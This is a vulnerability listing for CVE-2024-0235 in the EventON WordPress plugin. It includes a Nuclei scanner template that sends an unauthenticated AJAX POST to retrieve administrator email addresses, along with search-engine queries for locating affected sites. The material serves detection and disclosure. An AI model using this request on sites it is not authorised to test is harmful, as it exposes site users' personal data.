EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure

2024-04-2806:04:28

ProjectDiscovery

github.com

cve-2024-0235

wordpress

plugin

exposure

eventon

information disclosure

wpsec

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.029 Low

EPSS

Percentile

90.8%

JSON

The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.

id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: princechaddha
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.00052
    epss-percentile: 0.19233
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950